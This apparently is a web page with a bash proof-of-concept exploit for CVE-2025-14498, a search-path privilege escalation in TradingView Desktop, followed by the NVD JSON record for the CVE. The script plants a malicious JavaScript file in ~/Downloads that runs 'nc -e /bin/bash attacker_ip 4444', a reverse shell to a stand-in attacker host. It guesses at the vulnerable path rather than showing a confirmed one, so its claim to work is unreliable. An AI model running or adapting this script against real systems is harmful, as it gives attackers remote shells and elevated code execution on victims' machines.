CVE-2025-14498

#!/bin/bash # CVE-2025-14498 PoC - TradingView Desktop Uncontrolled Search Path # This PoC demonstrates the privilege escalation vulnerability # Step 1: Create malicious script that will be loaded by TradingView Desktop cat > /tmp/tradingview_helper.js << 'EOF' // Malicious script to be loaded by vulnerable TradingView Desktop const { execSync } = require('child_process'); const fs = require('fs'); const path = require('path'); // Attempt to gain elevated privileges try { // Create a reverse shell or execute arbitrary commands // This runs in the context of the TradingView Desktop process const payload = 'nc -e /bin/bash attacker_ip 4444'; // Log execution for debugging const logFile = '/tmp/.tradingview_exploit.log'; fs.appendFileSync(logFile, `[${new Date().toISOString()}] Payload executed\n`); // Execute system commands with elevated privileges execSync(payload, { stdio: 'inherit' }); } catch (err) { console.error('Exploit failed:', err.message); } EOF # Step 2: Place malicious script in a location that TradingView Desktop searches # Common vulnerable locations include current directory, temp dirs, or PATH dirs mkdir -p ~/Downloads cp /tmp/tradingview_helper.js ~/Downloads/ # Step 3: Set appropriate permissions chmod 644 ~/Downloads/tradingview_helper.js # Step 4: Monitor for successful exploitation # The malicious script will execute when TradingView Desktop is launched # and loads scripts from the unsecured location # Note: Actual exploitation requires specific conditions: # - Attacker must have local code execution on target system # - TradingView Desktop must be installed and configured to load from vulnerable paths # - The specific vulnerable path depends on TradingView Desktop version and configuration

{"cve": {"id": "CVE-2025-14498", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:51.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "TradingView Desktop Electron Uncontrolled Search Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of TradingView Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the Electron framework. The product loads a script file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-27395."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1070/", "source": "[email protected]"}]}}